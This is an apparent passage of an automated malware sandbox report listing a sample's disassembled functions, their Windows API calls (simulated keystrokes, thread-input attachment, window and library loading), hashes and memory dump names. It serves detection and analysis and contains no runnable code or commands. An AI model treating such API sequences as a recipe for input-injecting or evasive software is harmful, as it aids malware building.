GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 002EB473
SetKeyboardState.USER32(00000080), ref: 002EB48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 002EB4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 002EB54F

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5c0418bce6085e4007224916f1878dc5954e13662186e347be94bcf91a011d3d
Instruction ID: 1561fb6e42b03cd471473d2e36bd72d7cd1bdcc1b1afc8780ad7e6b068e57ff1
Opcode Fuzzy Hash: 5c0418bce6085e4007224916f1878dc5954e13662186e347be94bcf91a011d3d
Instruction Fuzzy Hash: 13318D70AE02996EFF33CF2788147FB7BB9AB49310FC4821AE095561D2C37489618B61

Function 002EB563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 002EB5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 002EB5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 002EB63B
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 002EB68D

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 418d9b06451dd04421de63a18f4a05954e1443590a4a5b364aee664dfc2ed810
Instruction ID: 8f8fb01b548e6924db1832c4f65db1f0663c8d4cc57debe9e23f8d47aee8127e
Opcode Fuzzy Hash: 418d9b06451dd04421de63a18f4a05954e1443590a4a5b364aee664dfc2ed810
Instruction Fuzzy Hash: 03315030DA06895EFF368F2688057FF7BAEFF89310F84422AE485561E1C3748961CB51

Function 003180AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 003180D4
GetWindowRect.USER32(?,?), ref: 0031814A
PtInRect.USER32(?,?,?), ref: 0031815A
MessageBeep.USER32(00000000), ref: 003181C6

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 4dd36dfa8dbd6b8addb73420613b28ea00feba913217671b90c0fd5f07a3eca0
Instruction ID: 27d0be7f52fce306afbd374b43be8777b1894686da959f30c83fb830dce9efc6
Opcode Fuzzy Hash: 4dd36dfa8dbd6b8addb73420613b28ea00feba913217671b90c0fd5f07a3eca0
Instruction Fuzzy Hash: 48418032A00215EFCB1BCF58C885AE977F9BF4E310F1540B8E9559B261CB30A883CB94

Function 00312176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00312187

Part of subcall function 002E4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002E43AD
Part of subcall function 002E4393: GetCurrentThreadId.KERNEL32 ref: 002E43B4
Part of subcall function 002E4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002E2F00), ref: 002E43BB

GetCaretPos.USER32(?), ref: 0031219B
ClientToScreen.USER32(00000000,?), ref: 003121E8
GetForegroundWindow.USER32 ref: 003121EE

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 75d6ef659ab09e76b0a6b592a92e32034ce2114a338dcc155f7768e74805562f
Instruction ID: 2fbf3f01a2dbe4e1ee669054a7d8712ac9d24de834ca7d6f0779ac3b03d891f4
Opcode Fuzzy Hash: 75d6ef659ab09e76b0a6b592a92e32034ce2114a338dcc155f7768e74805562f
Instruction Fuzzy Hash: 06317075D11109AFCB04EFA9C8818EEBBFCEF48304B5180AAE415E7251EA309E55CFA0

Function 002EE8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 002841EA: _wcslen.LIBCMT ref: 002841EF

_wcslen.LIBCMT ref: 002EE8E2
_wcslen.LIBCMT ref: 002EE8F9
_wcslen.LIBCMT ref: 002EE924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 002EE92F

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 889184edb30c04ff50b0e9569a191ad97105474c79aeb3742e1fa8ba2d9e323e
Instruction ID: 86dde76c26760873aec0a91b73cd045739ade8f452f2a910bdae76b45945acaa
Opcode Fuzzy Hash: 889184edb30c04ff50b0e9569a191ad97105474c79aeb3742e1fa8ba2d9e323e
Instruction Fuzzy Hash: 48210775950215AFCF10EFA4D981BEEB7F8EF46320F154065E808BB242DA709E11CBA1

Function 0031321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 003132A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 003132C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 003132CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003132DC

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: fc6c6b9dc5e607bde6e220b80a28ae196b2335b5d729e7cc93eca535a2e6b346
Instruction ID: a794bb85e5568182981ce2e7469ee95b09d55e66d005e0cc4748a75422ed6807
Opcode Fuzzy Hash: fc6c6b9dc5e607bde6e220b80a28ae196b2335b5d729e7cc93eca535a2e6b346
Instruction Fuzzy Hash: 1F21D831205111AFD71AAF14CC45FEA7B99EF4A324F248658F8268B6D2C771ED82CBD0

Function 002E825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 002E96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,002E8271,?,000000FF,?,002E90BB,00000000,?,0000001C,?,?), ref: 002E96F3
Part of subcall function 002E96E4: lstrcpyW.KERNEL32(00000000,?,?,002E8271,?,000000FF,?,002E90BB,00000000,?,0000001C,?,?,00000000), ref: 002E9719
Part of subcall function 002E96E4: lstrcmpiW.KERNEL32(00000000,?,002E8271,?,000000FF,?,002E90BB,00000000,?,0000001C,?,?), ref: 002E974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,002E90BB,00000000,?,0000001C,?,?,00000000), ref: 002E828A
lstrcpyW.KERNEL32(00000000,?,?,002E90BB,00000000,?,0000001C,?,?,00000000), ref: 002E82B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,002E90BB,00000000,?,0000001C,?,?,00000000), ref: 002E82EB

Strings

cdecl, xrefs: 002E82E2

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: fdd0ffa4bcd1769c75dd3f2079ad63ff552a04370c1851c3595761fc77b8e553
Instruction ID: 95a555b897863342632764b5a4a48badde496e895952b8f1fbafbfdfc584956f
Opcode Fuzzy Hash: fdd0ffa4bcd1769c75dd3f2079ad63ff552a04370c1851c3595761fc77b8e553
Instruction Fuzzy Hash: ED11E93A210382ABCB155F35D845DBA77E9FF49750B90402AF946C7250EF31D921C790

Function 003160FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 0031615A
_wcslen.LIBCMT ref: 0031616C
_wcslen.LIBCMT ref: 00316177
SendMessageW.USER32(?,00001002,00000000,?), ref: 003162B5

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: d225eed81b0e1c9a42b7be924891444df097117729aca144eb7707e0b2220a17
Instruction ID: 79aa28f8f7ecc15fd42a0e0425daa2d82f6d04af7cc68f0cd73b5bbfd5052076
Opcode Fuzzy Hash: d225eed81b0e1c9a42b7be924891444df097117729aca144eb7707e0b2220a17
Instruction Fuzzy Hash: BB112635500208EADB16DFA48C85EEF77BCEF5A350F10443AFA11D6181EBB0C981CB60

Function 002B2079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a810eba0d93c6921947b41487fdd77156e45804ccc2ae5ac0dbfb086288554ef
Instruction ID: cbb8a3e6d4728af16f03065e9f6e50055f2e79c14633093e28fe290c9f41179d
Opcode Fuzzy Hash: a810eba0d93c6921947b41487fdd77156e45804ccc2ae5ac0dbfb086288554ef
Instruction Fuzzy Hash: FA01A2B2639317BEF6213A786CC0FE7670DDF613F8B304B25B521A11D1DA608C688660

Function 002E2374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 002E2394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 002E23A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 002E23BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 002E23D7

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1d3ed0dc102f84a33163971b29f8878c0faf86a36067ac01a3832540e5b89a09
Instruction ID: 27592573a5c7cf6f75b268e89aa3f54c9afd06ee60addb6b5d65a3163f746704
Opcode Fuzzy Hash: 1d3ed0dc102f84a33163971b29f8878c0faf86a36067ac01a3832540e5b89a09
Instruction Fuzzy Hash: 9711F73A940219FFEB119BA5CD85F9DBB78FB08750F600091EA01B7290D6716E54DB94

Function 002EEAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 002EEB14
MessageBoxW.USER32(?,?,?,?), ref: 002EEB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002EEB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002EEB64

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: f6ee5750a03480d2b77fcec3f930e0d3760073f0a36ff3ee9ae5399bb8230991
Instruction ID: fa715516a4c12ca0585f35d2dafa3b09db43115cc8ea794467993967703e17ec
Opcode Fuzzy Hash: f6ee5750a03480d2b77fcec3f930e0d3760073f0a36ff3ee9ae5399bb8230991
Instruction Fuzzy Hash: 24112B76910259BBCB029FA99C06ADF7FBCAB47315F418219F815D3290D6B489048760

Function 002AD53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,002AD369,00000000,00000004,00000000), ref: 002AD588
GetLastError.KERNEL32 ref: 002AD594
__dosmaperr.LIBCMT ref: 002AD59B
ResumeThread.KERNEL32(00000000), ref: 002AD5B9

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 2b9b5705f5555addce0359073556f5883d07dcdf5b01b3e41c2db67e4570cae1
Instruction ID: 3dfeb8982a08e72cce1fade11ed6e4334f0dc7b68be83401eed5569c00c70256
Opcode Fuzzy Hash: 2b9b5705f5555addce0359073556f5883d07dcdf5b01b3e41c2db67e4570cae1
Instruction Fuzzy Hash: E901F976830214BBCB116FA5DC09BAA7B6CEF47735F104215F926875E0DF708824CAA1

Function 00287873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002878B1
GetStockObject.GDI32(00000011), ref: 002878C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 002878CF

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 9b73c2fa2f7890c1a476ec572d3cd9db31d6970279db4a13f5108747214f93f6
Instruction ID: cb4e2a0a20093362fd67cb4b7d9fb6579fb907aa9d48e5e6048ff0351fcb3ec2
Opcode Fuzzy Hash: 9b73c2fa2f7890c1a476ec572d3cd9db31d6970279db4a13f5108747214f93f6
Instruction Fuzzy Hash: DA118B72516149BFDF026F908C58EEA7B6DFF09364F144115FA00521A0D731DC60FBA0

Function 002B33E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,002B338D,00000364,00000000,00000000,00000000,?,002B35FE,00000006,FlsSetValue), ref: 002B3418
GetLastError.KERNEL32(?,002B338D,00000364,00000000,00000000,00000000,?,002B35FE,00000006,FlsSetValue,00323260,FlsSetValue,00000000,00000364,?,002B31B9), ref: 002B3424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002B338D,00000364,00000000,00000000,00000000,?,002B35FE,00000006,FlsSetValue,00323260,FlsSetValue,00000000), ref: 002B3432

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: e436c1a949178fd57c50d9e6c3284fd6ebc8ba0db7d36a7f3c25700144fd5752
Instruction ID: 3545e7b84c0ca3b0e75756a54d6fc107130a4c71b8d3234ec453f1b948c9edd8
Opcode Fuzzy Hash: e436c1a949178fd57c50d9e6c3284fd6ebc8ba0db7d36a7f3c25700144fd5752
Instruction Fuzzy Hash: 3B01B136621222ABCB238E69AC44AD77B7CAB05BA1B254620F916D3181CB20D912C6E0

Function 002EBA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,002EB69A,?,00008000), ref: 002EBA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,002EB69A,?,00008000), ref: 002EBAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,002EB69A,?,00008000), ref: 002EBABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,002EB69A,?,00008000), ref: 002EBAED

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 2e5a3b7642ba628424c027eb5276d6b27ab597009593a161f2cef60ec4cf8b23
Instruction ID: 5ab6c108f45804ada5da7e3da683f4fe36c31947a2335f5471408b38acc82185
Opcode Fuzzy Hash: 2e5a3b7642ba628424c027eb5276d6b27ab597009593a161f2cef60ec4cf8b23
Instruction Fuzzy Hash: AD115E31D50559E7CF01DFA6E9497EFBB78BF0A711F5040A5D541B2240CB705660CBA5

Function 0031886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0031888E
ScreenToClient.USER32(?,?), ref: 003188A6
ScreenToClient.USER32(?,?), ref: 003188CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 003188E5

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: e9413a13743bb4a4d5c69e02ec1e4379aba9bf126b4a37d1e3fd42b9c50d79d7
Instruction ID: 5ff51653ee04b7019f637af7cf8c2c625695c14046d78efe1ba380d370e81178
Opcode Fuzzy Hash: e9413a13743bb4a4d5c69e02ec1e4379aba9bf126b4a37d1e3fd42b9c50d79d7
Instruction Fuzzy Hash: 1A1143B9D00209EFDB41CF98C8849EEBBB9FF0D310F508156E915E2210D735AA94CF51

Function 002E36F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 002E3712
GetWindowThreadProcessId.USER32(?,00000000), ref: 002E3723
GetCurrentThreadId.KERNEL32 ref: 002E372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 002E3731

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 92fd14bc022b05d79d00b84e49828858548c6b2f2b4dab3cde0a6e72907bab0e
Instruction ID: a7c59bc1d45b175e0fe7c1424b6e4502a10bbbd9fa6abc8c3c3c98605cc08b94
Opcode Fuzzy Hash: 92fd14bc022b05d79d00b84e49828858548c6b2f2b4dab3cde0a6e72907bab0e
Instruction Fuzzy Hash: A1E092F15512647BDB215BA39C4DEEBBF6CEF4BBA2F804015F109D2080DAA4C940C2B0

Function 003192BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00281F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00281F87
Part of subcall function 00281F2D: SelectObject.GDI32(?,00000000), ref: 00281F96
Part of subcall function 00281F2D: BeginPath.GDI32(?), ref: 00281FAD
Part of subcall function 00281F2D: SelectObject.GDI32(?,00000000), ref: 00281FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 003192E3
LineTo.GDI32(?,?,?), ref: 003192F0
EndPath.GDI32(?), ref: 00319300
StrokePath.GDI32(?), ref: 0031930E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
